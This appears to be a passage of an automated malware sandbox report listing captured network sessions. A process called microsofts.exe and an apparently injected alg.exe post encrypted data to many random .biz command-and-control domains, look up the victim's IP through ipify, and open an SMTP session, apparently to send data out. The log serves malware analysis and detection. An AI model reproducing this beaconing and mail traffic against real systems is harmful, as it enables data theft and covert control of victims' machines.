                                                                                                                                                                                                                                                                                                          138192.168.2.55162954.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.726300001 CEST351OUTPOST /cdpttgyexq HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ywffr.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.726320028 CEST778OUTData Raw: e3 35 94 a6 4d 72 ac 33 fe 02 00 00 80 35 b5 57 ca 48 eb b3 a6 ec e1 b7 f6 5a 9f a1 ab 94 cc 95 35 30 3d 8e 88 a8 92 8e 90 14 04 99 2d d8 ea c0 35 5e 85 65 97 15 56 7b 62 1a ae 9b b7 17 84 75 24 b0 36 f7 0d 32 07 6e 2f 7a 77 10 ad ce b0 85 84 81
                                                                                                                                                                                                                                                                                                          Data Ascii: 5Mr35WHZ50=-5^eV{bu$62n/zwUe7-(iCravMWvu;@~UcjruJ04r$Pxe:d$zD.'QnB'D(Ic,^3%t1hFNnZAs
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.442004919 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:17 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=ef3c6a40d62203f2e6157a68d3c2a5f6|8.46.123.33|1728547757|1728547757|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          139192.168.2.55163013.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.770246983 CEST350OUTPOST /wgxnisegc HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gcedd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.770277023 CEST828OUTData Raw: f8 06 2f ea 83 0e 5f c4 30 03 00 00 1a 31 62 f9 05 fa f1 1a 4f 58 75 f7 06 96 62 bb e9 bc e4 50 b1 bb 1e b8 63 04 54 ce 40 d8 c5 e3 77 95 4c aa eb a3 05 96 79 16 e6 e7 22 53 5f 4d 50 0e 63 e7 b3 26 ce 7d f5 cc f4 b1 8a f9 d7 7a ec fd 3f 96 01 6c
                                                                                                                                                                                                                                                                                                          Data Ascii: /_01bOXubPcT@wLy"S_MPc&}z?l?((PV!V)Z9xmnep?BEazl6f?sX?2oN<k.EqzOAFtTm.7cwWU{z}m_ux*SNS`.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.160115004 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:17 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b0deb9016d66cb3f7623bd32baaadd7a|8.46.123.33|1728547757|1728547757|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          140192.168.2.55163154.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.650563002 CEST351OUTPOST /tckhwxqtj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.650592089 CEST778OUTData Raw: bd e4 5d 18 a9 1d f5 be fe 02 00 00 1e 33 52 70 7f 5d 96 c0 55 8e d2 b7 3d c3 bd b4 35 7d e1 29 e2 8b cc 85 86 87 b6 11 3d 14 d4 ed ac e7 79 bb f0 0a 8e f4 76 5d ee b7 07 9f 7d 5d a9 68 a7 b5 29 e7 b6 31 79 c6 a7 0d 97 29 8e f7 0f 08 6a 8c 36 11
                                                                                                                                                                                                                                                                                                          Data Ascii: ]3Rp]U=5})=yv]}]h)1y)j6Gn}XTw7SiqP]b\hJK5yj/"U9[F7KwXUPA(:KN^bnm,mrnsx(F1H;kJ,2>F2M
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.398711920 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:18 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=09feb055645ec02ca4d6a2cecbf28bc5|8.46.123.33|1728547758|1728547758|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          141192.168.2.55163218.208.156.24880576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.476519108 CEST350OUTPOST /ajbav HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.476654053 CEST828OUTData Raw: f5 57 14 a2 5c f0 1f 3b 30 03 00 00 49 bb 21 14 6a f3 6e 61 f8 b7 14 28 c5 42 21 b4 58 4b 4f 2f d0 16 b3 45 51 05 f1 f5 ba 3f 60 4f 3f d3 ab ea 24 22 0d a4 36 dc 5e f9 9c 83 b5 c4 62 07 da 89 dc c4 44 98 d9 5b da d4 36 e1 de 29 ca 20 fc 8b ec 65
                                                                                                                                                                                                                                                                                                          Data Ascii: W\;0I!jna(B!XKO/EQ?`O?$"6^bD[6) evJ-kEUZ-}Zn(qd[t-F?j,g!Qu8zR{KCNd<Go}f/Oho@SDc{p?Eh
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.962018013 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:19 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=785ce0c77f9dd63ac55c6bd3018b8b0c|8.46.123.33|1728547759|1728547759|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          142192.168.2.55163344.213.104.86807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.706688881 CEST350OUTPOST /kpiticjpb HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: pectx.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.706727028 CEST778OUTData Raw: 56 59 0b 6f c5 6d e8 d0 fe 02 00 00 f6 20 c4 3b fb e6 c1 5f 67 de c5 d0 b3 51 bc 58 ed 03 9b 85 f3 35 40 a6 ba e6 8c 74 b0 70 0e 6c ae f2 bc d8 24 0f d4 ab 76 4e 8d 7c 82 d4 13 ce 35 ea 69 99 f9 2e 2c be 8e 01 a9 4d 98 58 a9 9b f3 cc 96 c1 f7 57
                                                                                                                                                                                                                                                                                                          Data Ascii: VYom ;_gQX5@tpl$vN|5i.,MXW9W8D!-7bc1$r!5uYjC+cAQ+pv\?FT!fHxv5E ((lv;I9c;xg5U
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.210380077 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:20 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=94f3fc7e9eba19589fc66a474c55f4c3|8.46.123.33|1728547760|1728547760|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          143192.168.2.55163444.213.104.8680576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.214735031 CEST346OUTPOST /brqvg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: xccjj.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.214760065 CEST828OUTData Raw: 00 f1 0d 5f 27 84 84 af 30 03 00 00 42 92 61 a1 9b 0f 92 36 93 ec 5b e0 b1 ea 53 17 c8 89 da 2c 33 7a 88 fe 09 28 97 e8 1b 24 ad 5c 3e f1 18 55 d7 be 9f 19 2b 38 77 7c 67 d5 30 01 37 27 dd 7f 42 8d ee de de 55 55 d3 fd d2 2e f1 3d 6d fc f6 0c bc
                                                                                                                                                                                                                                                                                                          Data Ascii: _'0Ba6[S,3z($\>U+8w|g07'BUU.=m=Ze6u)Y*BRYwff(&> 1Yq|CJ"*a0$8V/dY1lZ}OLYckQ=M4@X~1s@CwV[B>K%)Z[K"
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.693849087 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:20 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=14fe589b933bba3d758de093670b79eb|8.46.123.33|1728547760|1728547760|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          144192.168.2.55163518.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.610559940 CEST349OUTPOST /mvljr HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.610559940 CEST778OUTData Raw: 99 e2 19 6c ff 53 1e 98 fe 02 00 00 63 0f 0f 01 bc 8d 24 79 6b d3 8b b8 8d 54 0d 21 7f 28 fb 13 8a 2c c1 ed 94 e1 14 6d 5e de a0 be c9 39 9a ad 1d 77 78 fe 1d 96 dc 3f b7 86 1b bc 53 5e 62 1b 9c 46 3f c0 7b 10 3c 1c d8 81 f0 fa 84 a2 2e a7 ec 18
                                                                                                                                                                                                                                                                                                          Data Ascii: lSc$ykT!(,m^9wx?S^bF?{<.Lp&jA3j!%~/A_.z>YX*6}E/ISA,(Sj#|[f7X^P.d/.,st 1bL8,tr] .?(6A/
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.085896969 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:21 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=222221af87ab95cb3bfce058f8b422ed|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          145192.168.2.55163644.221.84.10580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716574907 CEST353OUTPOST /bvbcgrbcs HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716628075 CEST828OUTData Raw: f9 c0 36 df 74 f7 d6 6f 30 03 00 00 c2 a3 d8 12 66 42 8e 42 b1 a9 0d e1 a5 33 8f 93 a7 22 9d 68 d6 59 f1 13 c5 00 ac b7 fc c4 66 0f 8b 1a 4f 66 19 43 19 ba 24 f3 a1 7c 93 62 08 58 a8 5f 2f e6 ab a0 4e 95 e3 d4 a3 1a ed ef 46 1e ce 32 3f a3 8e a6
                                                                                                                                                                                                                                                                                                          Data Ascii: 6to0fBB3"hYfOfC$|bX_/NF2?Nv/4,T\LH]frF^A$IVLKH5}y%kDn]\q;ls<$&PykdGn d:2a/c=U(<XT:jxr=b'bgP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.185419083 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:21 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=88af10846c178676334e69bad9724ec7|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          146192.168.2.55163754.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.206207991 CEST346OUTPOST /bgpu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.207370043 CEST828OUTData Raw: 53 1d ea 35 b2 d4 90 27 30 03 00 00 69 ef ea 24 c4 32 70 58 4c 06 db 5a 24 bb 87 18 ba 55 7c 52 63 43 51 03 3c 72 55 38 7a bb 4c e1 00 0f e5 c3 5b fd a5 9c ba bf 80 c8 c7 ee 8f 3d 6c c5 d4 73 04 10 f6 13 03 66 5c 37 a3 b6 1c d0 97 4d 77 85 2c 86
                                                                                                                                                                                                                                                                                                          Data Ascii: S5'0i$2pXLZ$U|RcCQ<rU8zL[=lsf\7Mw,kpX9*%4vJW%YDa)"jf.MW8+Xi2WV@dK=oI{%I`4L=ru7aG&@x l! W
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.956712961 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:21 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=da06d71c6d2ab0842264367c47d3dd40|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          147192.168.2.55163844.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346963882 CEST349OUTPOST /wrjeoyp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: banwyw.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346992016 CEST778OUTData Raw: d8 22 1f c8 63 7f 4e a9 fe 02 00 00 89 00 76 1a ac cd fe bf 3d 61 e2 b6 ea d3 6c 40 c3 72 05 1e c7 12 9e ec 23 a4 75 56 83 1c 59 52 dc 23 7a 41 55 50 3e 78 80 53 61 c3 fa 84 f6 93 e0 8f f5 2c 45 f1 c9 ad 60 4e f8 e5 6c 4c fd ea 71 49 dd 13 d2 18
                                                                                                                                                                                                                                                                                                          Data Ascii: "cNv=al@r#uVYR#zAUP>xSa,E`NlLqI9{uJo*J<A;4j448/IBcSwt;d:>S,Ow,$lx-3,`n{leKR2E1R{rTL"\}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.822458029 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:21 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b56f102d04f8702e1ae05955caa5cd3f|8.46.123.33|1728547761|1728547761|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          0192.168.2.549704104.26.12.205443576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          2024-10-10 08:07:24 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          2024-10-10 08:07:24 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:07:24 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                          CF-RAY: 8d051dd8dc98c345-EWR
                                                                                                                                                                                                                                                                                                          2024-10-10 08:07:24 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                          SMTP Packets

                                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.611766100 CEST5874971251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 10 Oct 2024 08:07:28 +0000
                                                                                                                                                                                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.611938000 CEST49712587192.168.2.551.195.88.199EHLO 172892
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.791620016 CEST5874971251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 172892 [8.46.123.33]
                                                                                                                                                                                                                                                                                                          250-SIZE 52428800
                                                                                                                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                                                                                                                          250-PIPELINING
